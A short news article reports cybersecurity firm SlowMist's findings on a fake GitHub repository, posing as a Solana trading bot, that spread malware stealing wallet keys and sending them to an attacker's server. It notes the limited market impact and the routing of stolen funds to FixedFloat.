- Malware targeted Solana wallet users through fake GitHub repository.
- Funds routed to FixedFloat, lacking robust KYC protocols.
- No official statements from Solana Foundation or major exchanges.
A fake GitHub repository, supposedly offering a Solana trading bot, was used to distribute malware, according to cybersecurity firm SlowMist.
Malicious GitHub Repository Poses Threat
A malicious GitHub repository claimed to offer a Solana trading bot but instead distributed malware to steal wallet credentials. SlowMist, a cybersecurity firm, investigated and exposed the sophisticated supply chain attack.
Method of Attack
The attacker, operating under the alias zldp2002, used fake GitHub accounts to legitimize the repository, increasing its credibility within the community. This strategy aimed to target Solana wallet users specifically.
Impact on Wallet Security
“Once installed, this package silently scanned for private keys and wallet files on the user’s device and sent them to an attacker-controlled server, githubshadow.xyz.” — SlowMist, Cybersecurity Firm
The breach compromised Solana wallet users’ security, siphoning funds to attacker-controlled addresses. The stolen assets were tracked and confirmed routed to FixedFloat, a platform known for its inefficient KYC protocols.
Limited Market Impact and Historical Context
Despite the theft, the market impact was limited primarily to individuals downloading the compromised code. There was no broad protocol-level vulnerability affecting Solana or DeFi projects observed.
Currently, there are no reports of any significant loss in larger market metrics, such as TVL, or noticeable liquidity changes as a result of this breach. SlowMist’s reports focus on individual user-level losses.
Historical analysis shows similar supply chain attacks in the crypto industry, impacting multiple blockchains and user assets. The targeted exploitation underscores ongoing challenges in open-source platform security.
